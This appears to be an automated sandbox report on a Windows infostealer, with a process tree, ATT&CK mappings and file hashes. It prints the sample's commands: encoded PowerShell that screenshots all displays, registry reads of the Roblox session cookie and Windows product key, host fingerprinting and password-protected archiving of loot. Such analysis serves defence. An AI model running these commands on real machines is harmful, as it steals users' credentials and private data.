    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4008
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qnuj0ney\qnuj0ney.cmdline"
        5⤵
        
        PID:4416
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF2FB.tmp" "c:\Users\Admin\AppData\Local\Temp\qnuj0ney\CSCDFF1F6CBD70D4BE7AF6339F36D49F1BE.TMP"
        6⤵
        
        PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2668
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2748
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2716
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2240
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3872
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4648
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2512
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3392
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:564
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI35362\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\ymemt.zip" *"
    3⤵
    PID:4560
  - - C:\Users\Admin\AppData\Local\Temp\_MEI35362\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI35362\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\ymemt.zip" *
      4⤵
      Executes dropped EXE
      PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2140
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3416
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4380
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1712
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2572

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4467_none_7e0f83e07c8c1985\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:1036

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
- System Location Discovery: System Language Discovery
PID:2272

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\srchadmin.dll ,
1⤵
PID:2096

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2348
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:1212
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1916 -prefMapHandle 1736 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7971b36c-32f7-47a4-b9f0-fa2462867f29} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" gpu
    3⤵
    PID:4360
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2360 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5695bbc3-80c8-47d7-addf-83489a2f89a9} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" socket
    3⤵
    PID:1032
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3236 -childID 1 -isForBrowser -prefsHandle 3216 -prefMapHandle 2852 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {68e91e34-e488-459d-b0c8-c14ceab25d5a} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
    3⤵
    PID:1048
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3692 -childID 2 -isForBrowser -prefsHandle 3684 -prefMapHandle 3700 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8448478d-2979-4462-8ddb-13a0bae66d98} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
    3⤵
    PID:3276
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4792 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4728 -prefMapHandle 4776 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e418922-a114-4421-97d8-b9ced15c73f7} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" utility
    3⤵
    - Checks processor information in registry
    PID:4364
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5408 -childID 3 -isForBrowser -prefsHandle 5428 -prefMapHandle 5356 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f4619d9-9a3a-4c56-bd6f-e33e08043e94} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
    3⤵
    PID:4696
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5564 -childID 4 -isForBrowser -prefsHandle 5572 -prefMapHandle 5360 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6ff35282-d640-4819-9adf-8fd785083381} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
    3⤵
    PID:1596
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5840 -prefMapHandle 5836 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ad2f5aa9-f810-4ef6-b399-b89c99fcc010} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
    3⤵
    PID:4944
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6308 -childID 6 -isForBrowser -prefsHandle 6272 -prefMapHandle 6296 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d189b9b7-71f2-41de-9621-15e16dacf3f5} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab
    3⤵
    PID:448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
192B

MD5
93d9cc8ab353fdd733b5646880de3de1

SHA1
7fde7581acdcd38fa0504921a587ca85568c75cf

SHA256
f16d71fb18593c25f71f0781278efd962bfbf5be147307b71522b64881a515fc

SHA512
d75ff1228342401e557dc2e70808466a150dbdca9809817ee953622f1b6a432fdebd7cea2fe0e61ea591ab0310fabaacc5e133c1629df7d85955c468a5c7915b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a807b1c91ac66f33f88a787d64904c1

SHA1
83c554c7de04a8115c9005709e5cd01fca82c5d3

SHA256
155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

SHA512
29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
666083f9ab7ba1342c8774bef23379af

SHA1
8e8795a4d139e467e7cda71dc90f09d6cfd6cef9

SHA256
f293f12ad1d0ac464d1d66fbfed3e4a94d33ee07946b6b6953c5169cdc6f782a

SHA512
44f10009d56b47e89a1b625559966319fb3837cd7121a70a66df7690589482f8aa6d19ef16cb5a436a82552ca11e9f887863f9b4fcf073fe17e09ef1d931a682

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afyb4qvh.default-release\activity-stream.discovery_stream.json

Filesize
19KB

MD5
e0824c38c6b37ef5f099655d194d7ebb

SHA1
fe2325974b38f57bce95032d496c55d6771d4e7f

SHA256
7af4a92c312f5d1be79acf2f9fc79986bd89f41d7c83839c254dc623298b92c1

SHA512
